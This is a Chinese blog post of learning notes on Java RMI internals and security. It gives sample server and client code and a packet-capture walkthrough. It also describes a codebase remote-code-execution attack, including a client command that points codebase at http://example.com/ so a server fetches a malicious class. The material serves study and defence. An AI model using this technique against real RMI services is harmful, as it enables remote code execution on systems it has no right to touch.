Java安全学习之RMI
最近在看Phith0n师傅的知识星球的Java安全漫谈系列,随手记下笔记
RMI全称
远程方法调用(Remote Method Invocation)。这是允许驻留在一个系统(JVM)中的对象调用在另一个JVM上运行的对象的一种机制,能够远程调用远程对象的方法。
RMI通信过程、原理
我们首先来分析下RMI的流程:
首先编写一个RMI Server:
package RMI_Test;import java.rmi.Naming;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.server.UnicastRemoteObject;public class RMIServer {public interface IRemoteHelloWorld extends Remote {public String hello() throws RemoteException;}public class RemoteHelloWorld extends UnicastRemoteObject implements IRemoteHelloWorld {protected RemoteHelloWorld() throws RemoteException {super();}public String hello() throws RemoteException {System.out.println("call from");return "Hello, World";}}private void start() throws Exception {RemoteHelloWorld h = new RemoteHelloWorld();LocateRegistry.createRegistry(1099);Naming.rebind("rmi://127.0.0.1:1099/Hello", h);}public static void main(String[] args) throws Exception {new RMIServer().start();}
}
一个RMI Server的过程分为以下三个步骤:
- 首先继承了
java.rmi.Remote的接口,其中定义需要远程调用的方法,例如这里的hello() - 其次需要使用
java.rmi.Remote的接口 - 定义一个主类,用来创建
Registry,并将上面的类实例化后绑定到一个地址
接着编写一个RMI Client:
package RMI_Test;import java.rmi.Naming;public class RMIClient {public static void main(String[] args) throws Exception {RMIServer.IRemoteHelloWorld hello = (RMIServer.IRemoteHelloWorld) Naming.lookup("rmi://192.168.7.2:1099/Hello");String ret = hello.hello();System.out.println(ret);}
}
客户端使用Naming.lookup在Registry中寻找到名字是Hello的对象,这里虽说是执行远程方法的时候代码是在远程服务器上执行的,但实际上还是需要知道有哪些方法,这时候接口的重要性就体现了,这也是为什么需要继承Remote并将我们需要调用的方法写在接口IRemoteHelloWorld里,因为客户端也需要用到这个接口。
这里使用WrireShark抓包来分析理解RMI的通信过程:
选择回环口
这就是RMI完整的通信过程,可以发现整个过程进行了两次TCP握手,也就是建立了两次TCP连接
第一次建立TCP连接是连接到远端192.168.135.142的1099端口,这也是服务端设置的端口(1099是RMI通信的默认端口),连接后客户端向远端发送了一个Call消息,远端回复了一个ReturnData消息,然后客户端新建了一个TCP连接到远端的24641端口
那么为什么会连接24641端口呢?,在ReturnData这个包中,返回了目标的IP地址192.168.7.2,其后的两个字节就是24641的十六进制:
>>> int("6041", 16)
24641
这段数据从ac ed开始往后就是Java序列化数据了,IP和端口只是这个对象的一部分,捋一捋这整个过程:
- 首先客户端连接
Registry,并在其中寻找Name是Hello的对象,这个对应数据流中的Call消息;然后Registry返回一个序列化数据,这个就是找到的Name=Hello的对象,这个对应数据流中的ReturnData消息;客户端反序列化该对象,发现该对象是一个远程对象,地址在192.168.7.2:24641,于是再与这个地址建立TCP连接,在这个新的连接中,才执行真正的方法调用,也就是hello()。
RMI Registry就像一个网关,它自己是不会执行远程方法的,但是RMI Server可以在上面注册一个Name到对象的绑定关系;RMI Client通过Name向RMI Registry查询,得到这个绑定关系,然后再连接RMI Server;最后,远程方法实际上在RMI Server上调用。
接下来来看下RMI的底层架构是如何实现的:
RMI底层通讯采用了Stub(运行在客户端)和Skeleton(运行在服务端)机制,RMI调用远程方法的底层通讯大致如下:
RMI客户端在调用远程方法时会先创建Stub(sun.rmi.registry.RegistryImpl_Stub)Stub会将Remote对象传递给远程引用层(java.rmi.server.RemoteRef)并创建java.rmi.server.RemoteCall(远程调用)对象RemoteCall序列化RMI服务名称、Remote对象RMI客户端的远程引用层传输RemoteCall序列化后的请求信息通过Socket连接的方式传输到RMI服务端的远程引用层RMI服务端的远程引用层(sun.rmi.server.UnicastServerRef)收到请求会请求传递给Skeleton(sun.rmi.registry.RegistryImpl_Skel#dispatch)Skeleton调用RemoteCall反序列化RMI客户端传过来的序列化Skeleton处理客户端请求:bind、list、lookup、rebind、unbind,如果是lookup则查找RMI服务名绑定的接口对象,序列化该对象并通过RemoteCall传输到客户端RMI客户端反序列化服务端结果,获取远程对象的引用RMI客户端调用远程方法,RMI服务端反射调用RMI服务实现类的对应方法并序列化执行结果返回给客户端RMI客户端反序列化RMI远程方法调用结果
如何攻击RMI Registry?
首先,RMI Registry是一个远程对象管理的地方,可以理解为一个远程对象的”后台“,当我们尝试直接访问”后台“功能,如果尝试直接访问”后台“功能,会出现报错,因为Java对远程访问RMI Registry做了限制,只有来源地址是localhost的时候,才能调用rebind、bind、unbind等方法,不过list、lookup方法可以远程调用。
而lookup的作用就是获取某个远程对象,那么只要目标服务器上存在一些危险方法,我们就可以通过RMI对其进行调用,例如工具:https://github.com/NickstaDB/BaRMIe,其中一个功能就是进行危险方法的探测。
RMI利用codebase执行任意代码
Applet是采用Java编程语言编写的小应用程序,该程序可以包含在 HTML(标准通用标记语言的一个应用)页中,与在页中包含图像的方式大致相同。含有Applet的网页的HTML文件代码中部带有<applet></applet>这样一对标记,当支持Java的网络浏览器遇到这对标记时,就将下载相应的小应用程序代码并在本地计算机上执行该Applet。
<applet code="HelloWorld.class" codebase="Applets" width="800" height="600"></applet>
在使用Applet的时候通常需要指定一个codebase属性,而RMI在远程加载的场景中,也会涉及到codebase,codebase是一个地址,告诉Java虚拟机前往指定的地址搜索类,类似CLASSPATH,但是CLASSPATH是本地路径,而codebase通常是远程URL
例如指定codebase=http://example.com/,然后加载org.vulhub.example.Example类,则Java虚拟机会下载这个文件http://example.com/org/vulhub/example/Example.class,并作为Example类的字节码
在RMI的流程中,客户端和服务端之间传递的是一些序列化后的对象,这些对象在反序列化时,就回去寻找类,如果某一段反序列化时发现一个对象,那么就回去本地CLASSPATH下寻找相对应的类;如果在本地没有找到这个类,就会去远程加载codebase中的类。
如果控制了codebase,就可以加载自己构造的恶意类,可以将codebase随着序列化数据一起传输,服务器在接收到这个数据后就会去CLASSPATH和指定的codebase寻找类,导致RCE
不过需要满足如下条件的RMI服务器才能被攻击:
- 安装并配置了
SecurityManager - Java版本低于
7u21、6u45或者设置了java.rmi.server.useCodebaseOnly=false
其中java.rmi.server.useCodebaseOnly是在Java 7u21、6u45的时候修改的一个默认配置,官方将java.rmi.server.useCodebaseOnly的默认值由false改为了true。在java.rmi.server.useCodebaseOnly配置为true的情况下,Java虚拟机将只信任预先配置好的codebase,不再支持从RMI请求中获取。
这里Phith0n师傅提供了一个案例:
服务端:
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.List;public interface ICalc extends Remote {public Integer sum(List<Integer> params) throws RemoteException;
}
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
import java.util.List;public class Calc extends UnicastRemoteObject implements ICalc {public Calc() throws RemoteException {}public Integer sum(List<Integer> params) throws RemoteException {Integer sum = 0;for (Integer param : params) {sum += param;}return sum;}
}
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;public class RemoteRMIServer {private void start() throws Exception {if (System.getSecurityManager() == null) {System.out.println("setup SecurityManager");System.setSecurityManager(new SecurityManager());}Calc h = new Calc();LocateRegistry.createRegistry(1099);Naming.rebind("refObj", h);}public static void main(String[] args) throws Exception {new RemoteRMIServer().start();}
}
client.policy,放在jdk1.8.0_341\\jre\\lib\\security\\下,不过运行的时候最好用绝对路径
grant {permission java.security.AllPermission;
};
运行
javac *.java
java -Djava.rmi.server.hostname=192.168.135.142 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer
客户端
import java.io.Serializable;
import java.rmi.Naming;
import java.util.ArrayList;
import java.util.List;public class RMIClient implements Serializable {public class Payload extends ArrayList<Integer> {}public void lookup() throws Exception {ICalc r = (ICalc) Naming.lookup("rmi://192.168.50.3:1099/refObj");List<Integer> li = new Payload();li.add(3);li.add(4);System.out.println(r.sum(li));}public static void main(String[] args) throws Exception {new RMIClient().lookup();}
}
这个Client我们需要在另一个位置运行,因为我们需要让RMI Server在本地CLASSPATH里找不到类,才
会去加载codebase中的类,所以不能将RMIClient.java放在RMI Server所在的目录中。
java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://example.com/ RMIClient
我们只需要编译一个恶意类,将其class文件放置在Web服务器的/RMIClient$Payload.class即可。
不过我这里并没有执行成功,尝试过很多解决方法都不行(java版本问题,classpath问题,目录问题都尝试过),如果有师傅这一步能成功加载到codebase的,希望通过以下联系方式加个好友,想请教下,有偿,谢谢。